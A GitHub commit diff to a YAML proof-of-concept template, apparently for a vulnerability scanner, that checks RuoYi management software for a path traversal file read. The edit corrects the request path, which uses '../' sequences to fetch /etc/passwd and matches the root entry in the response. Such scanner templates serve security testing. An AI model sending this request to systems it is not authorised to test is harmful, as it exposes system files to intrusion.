Update ruoyi-management-fileread.yml

This commit is contained in:
影舞者 2024-12-19 20:16:49 +08:00 committed by GitHub
parent 97b205f4a7
commit ce211fef78
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -2,7 +2,7 @@ name: poc-yaml-ruoyi-management-fileread
groups:
linux:
- method: GET
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
path: /common/download/resource?resource=/profile/../../../../etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
windows: